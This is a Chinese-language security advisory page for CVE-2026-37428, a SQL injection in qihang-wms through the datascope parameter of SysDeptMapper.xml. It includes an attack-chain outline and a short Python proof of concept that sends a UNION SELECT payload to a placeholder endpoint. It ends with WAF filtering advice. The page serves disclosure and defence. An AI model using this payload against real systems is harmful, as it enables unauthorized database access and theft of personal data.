IPBUF安全漏洞报告
English
CVE-2026-37428 CVSS 6.5 中危

CVE-2026-37428: qihang-wms SQL注入漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-37428
漏洞类型
SQL注入
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
qihang-wms

相关标签

SQL注入qihang-wms数据泄露无需认证

漏洞概述

qihang-wms系统在commit 75c15a版本中被发现存在严重的SQL注入漏洞。该漏洞源于SysDeptMapper.xml文件中datascope参数未经过滤直接拼接SQL语句。攻击者可利用此漏洞无需认证访问敏感数据库信息,窃取用户个人身份信息(PII)及其他核心数据,存在高数据泄露风险。

技术细节

该漏洞技术核心在于MyBatis映射文件中的参数处理机制不严谨。在qihang-wms的SysDeptMapper.xml文件中,datascope参数被直接拼接到SQL查询语句中,而非使用预编译语句(如#{}占位符)或进行严格的过滤。这导致攻击者可以通过构造特定的恶意SQL载荷,利用datascope参数注入任意SQL命令。由于CVSS向量显示PR:N(无需认证),攻击者无需登录系统即可发起攻击。漏洞利用方式通常包括基于布尔盲注、时间盲注或联合查询注入。成功利用后,攻击者可以绕过应用程序的身份验证机制,直接查询底层数据库,获取包含用户PII在内的敏感信息,甚至可能修改部分数据(I:L),对系统完整性造成破坏。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是qihang-wms,并确认其可能受影响版本。
STEP 2
漏洞探测
攻击者向受影响端点发送带有特殊字符(如单引号)的datascope参数,测试是否存在SQL语法错误。
STEP 3
构造攻击载荷
确认漏洞存在后,攻击者构造恶意的SQL语句(如UNION SELECT),试图提取数据库结构或敏感数据。
STEP 4
数据窃取
服务器执行注入的SQL语句,返回包含用户PII(个人身份信息)的敏感数据给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL Placeholder (Based on vulnerability context) target_url = "http://target-wms-endpoint/api/dept/query" # Malicious payload demonstrating SQL Injection via datascope # Attempting to extract database version using Union-based injection payload = "1' UNION SELECT 1, version(), 3, 4--+" # Vulnerable parameter identified in SysDeptMapper.xml params = { "datascope": payload } try: # Sending the malicious request response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] Potential Vulnerability Detected!") print("[+] Response Body:") print(response.text[:500]) # Print first 500 chars for verification else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

qihang-wms commit 75c15a

防御指南

临时缓解措施
在未发布官方补丁前,建议在网络边界部署Web应用防火墙(WAF),针对datascope参数添加严格的过滤规则,拦截包含SQL关键字(如UNION, SELECT, AND, OR, ')的恶意请求。同时,应检查数据库日志并限制应用数据库账户的读写权限,防止通过漏洞拖库。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表